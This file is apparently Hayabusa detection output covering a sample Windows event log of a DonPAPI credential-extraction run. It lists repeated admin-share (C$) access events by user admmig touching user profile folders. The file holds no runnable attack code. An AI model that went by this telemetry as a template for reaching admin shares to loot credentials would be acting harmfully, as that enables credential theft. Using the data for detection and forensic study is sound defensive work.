2021-12-12 16:16:05.339 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.339 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.339 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.354 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.354 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.354 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.354 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.370 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.371 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.372 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.372 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.372 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.372 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.372 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.372 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.388 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.388 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.388 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.388 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.388 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.388 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.388 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.388 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.407 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.408 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.408 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.408 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.408 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.408 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.408 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.408 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.424 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.424 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.424 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.424 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.439 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.439 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.439 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.439 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.439 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.439 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.439 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.455 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.455 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.455 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.455 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.455 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.455 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.455 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.471 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.471 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.471 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.471 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.486 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.486 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.486 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.486 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.486 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.502 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.502 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.502 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.549 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.549 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.564 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.564 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.564 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.564 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.580 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
